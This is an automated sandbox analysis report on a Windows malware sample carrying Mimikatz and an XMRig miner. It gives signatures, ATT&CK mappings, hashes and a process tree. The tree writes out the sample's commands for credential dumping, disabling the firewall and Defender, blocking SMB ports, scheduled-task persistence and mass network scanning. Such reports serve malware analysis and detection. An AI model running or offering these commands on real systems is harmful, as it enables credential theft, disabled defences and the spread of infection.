Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
16-11-2024 02:15
General
-
Target
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe
-
Size
9.2MB
-
MD5
9aa307bf17ed00c9228c8e34433ed6b0
-
SHA1
0bd67d97a100efd3245eec2fe0d7169e761ebdaf
-
SHA256
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643e
-
SHA512
c501a220d53f4b1abab239bb2c3c57a2137afc3bbbe074aa5504ae71c007d17acc9901eabbdefd914be8e0bd322997a41f39f7ef0b52e3d37a8b810fb5591d4e
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (3906) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 7 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 31 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\bgegeutip\ceuhqk.exe"C:\Windows\TEMP\bgegeutip\ceuhqk.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe"C:\Users\Admin\AppData\Local\Temp\3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qpkiztfb\gaettyt.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\qpkiztfb\gaettyt.exeC:\Windows\qpkiztfb\gaettyt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\qpkiztfb\gaettyt.exeC:\Windows\qpkiztfb\gaettyt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exeC:\Windows\utbcclcbi\kgwtlrdzw\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\utbcclcbi\kgwtlrdzw\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exeC:\Windows\utbcclcbi\kgwtlrdzw\bilutlrif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\utbcclcbi\kgwtlrdzw\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\utbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\utbcclcbi\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\utbcclcbi\Corporate\vfshost.exeC:\Windows\utbcclcbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ytkutiuha" /ru system /tr "cmd /c C:\Windows\ime\gaettyt.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ytkutiuha" /ru system /tr "cmd /c C:\Windows\ime\gaettyt.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "augdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "augdqptyd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "magaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "magaujzua" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 760 C:\Windows\TEMP\utbcclcbi\760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 64 C:\Windows\TEMP\utbcclcbi\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 1004 C:\Windows\TEMP\utbcclcbi\1004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2484 C:\Windows\TEMP\utbcclcbi\2484.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2892 C:\Windows\TEMP\utbcclcbi\2892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3008 C:\Windows\TEMP\utbcclcbi\3008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2840 C:\Windows\TEMP\utbcclcbi\2840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3720 C:\Windows\TEMP\utbcclcbi\3720.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3816 C:\Windows\TEMP\utbcclcbi\3816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3876 C:\Windows\TEMP\utbcclcbi\3876.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3956 C:\Windows\TEMP\utbcclcbi\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2236 C:\Windows\TEMP\utbcclcbi\2236.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3888 C:\Windows\TEMP\utbcclcbi\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 2920 C:\Windows\TEMP\utbcclcbi\2920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 3372 C:\Windows\TEMP\utbcclcbi\3372.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 1300 C:\Windows\TEMP\utbcclcbi\1300.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\utbcclcbi\spitymcii.exeC:\Windows\TEMP\utbcclcbi\spitymcii.exe -accepteula -mp 1256 C:\Windows\TEMP\utbcclcbi\1256.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\utbcclcbi\kgwtlrdzw\scan.bat2⤵
-
C:\Windows\utbcclcbi\kgwtlrdzw\lutllwily.exelutllwily.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\umueiy.exeC:\Windows\SysWOW64\umueiy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qpkiztfb\gaettyt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\gaettyt.exe1⤵
-
C:\Windows\ime\gaettyt.exeC:\Windows\ime\gaettyt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bgegeutip\ceuhqk.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.1MB
MD54a4a733279e6190fef5db07ad650e222
SHA179b03d5891fb82692613ec9b9537ab3ed588a380
SHA2566f09cb3158fd952454ff29fe42083e3adac6a43194fc1fbf4fe90b3b873c1c78
SHA5126908922189f2f574ab3f7a443e6dd936b7885faf2e4b90079864ed80f2bc42d672b105ae05bebbb06c9ce72edf0752d5424bbf095e1378f699b46fb1b5a1b252
-
Filesize
1.2MB
MD514ecffaf328efaca169ce60e9591f630
SHA11ebb98eccd69dd0a0e9b754587c1c94e5092dc42
SHA256a2e9fe736cd3922221a100de2f498e3181e4ee46cc664f87f73d6132ba6218c9
SHA512e60613b7311097c4c5f325204bd2f33ff8a2098fc61a5558c10b48a04e191a4deb241a554b7330bc094778c5a9f49e6f159dea4747aaa35969d6a518fed409e0
-
Filesize
7.5MB
MD567c62b9b1ff30f00e1a15cfd767cba36
SHA1c24e72e3aa8137d3b2a86faa1d6572cdab773e32
SHA256df29fb3b90d232a611ed9301aa66a6cb65b880b3089b331fe5e094202156dac4
SHA5122ec75646fd1531801689eaa047f1623702c4116603aa5d478689d23bedc17060c901c0a73ead768756c2c4e59f5b48eab1a3fcedf89a503957962dcb5b82a3ed
-
Filesize
814KB
MD5a4a50842a7096b8b6579c0a92a78767e
SHA134e0288e8a5bb8a583ca0e66caf75e6be6f990ad
SHA256c11f644715d7ff0b1d182a828e2eeb0df8aad4fe2b664b3899de649a0b553e44
SHA51236532cc4d6ea2583d9dc987e58137437cdb234c9d4f4a33ae5a18894ad2cc0460c0dd6462f90eca047470b202d6a7e6b35b4810b5d5f6869002b0c3e684a150d
-
Filesize
4.0MB
MD5f40d06ff14193d94b609220f507f0715
SHA1a20a8778aabc1710ce1ae357265bce4eaa8728b6
SHA2560cb93bf08bdd45158405b6496b86397b5475d6a225af2137b400df6afe29993a
SHA5122f785ee86039af6844fff1599a6bffdcef9351bddff93aa4904098aa826aedac815f8845f1323003f658912fa2b93e0b9843355a1579506556b942d8e23da7fd
-
Filesize
8.4MB
MD567708419870d71b9dad65eff473fd116
SHA1022169908dda1bd6798aa59ac8ceaa80a87c22ff
SHA2563c04ece42b55dee769aa63d42b32b3f4bc215f58473df3b86e67bae979026a7b
SHA512805d1525f8ef3cdb2b75b184445ff6ccf6f0a4d3cdcdb3cde0e1fbc72e41fecd0a1c975c4585663c7e0e043965c8b2cafa469f772ed6ff4336b8ec1f4b074df5
-
Filesize
2.9MB
MD5598c90319e6f6f3417fe428e37118d7c
SHA1b153271156d57e1260b0421086af5667f1ccf597
SHA2568d0e1c03ed6c1056838302d25cb9f2c460e239e4cd2c15a7ae516db33b4c017e
SHA51215bc22f250ab500c7799ba09033a080c0b1594af9f111d3c0dbacdfdab32fe482ab1b57b43fcbaacb7e3e3dd56b5afd4a953f389729c06ef9f46bb1698e327ce
-
Filesize
2.5MB
MD53f4b2fafc8ab8897dfcfebea486776a2
SHA15b9b647f8f3c471f0ed04e57679f1b61326c11e2
SHA256efe482888fb09c04267178f07f17cc3812cedae7f9a5f56b60deb3605ca791f4
SHA512c6e9606b09a6fbfa595b9b9be653b6933c5dcf23cbb10126940c4e225532b85e9f0463c58e51f35c3faef4e2e20cdf0c1d7a7330ea9c4e8b798277520b45921d
-
Filesize
20.6MB
MD55835f65ccb7e1c2b883dfc057744170d
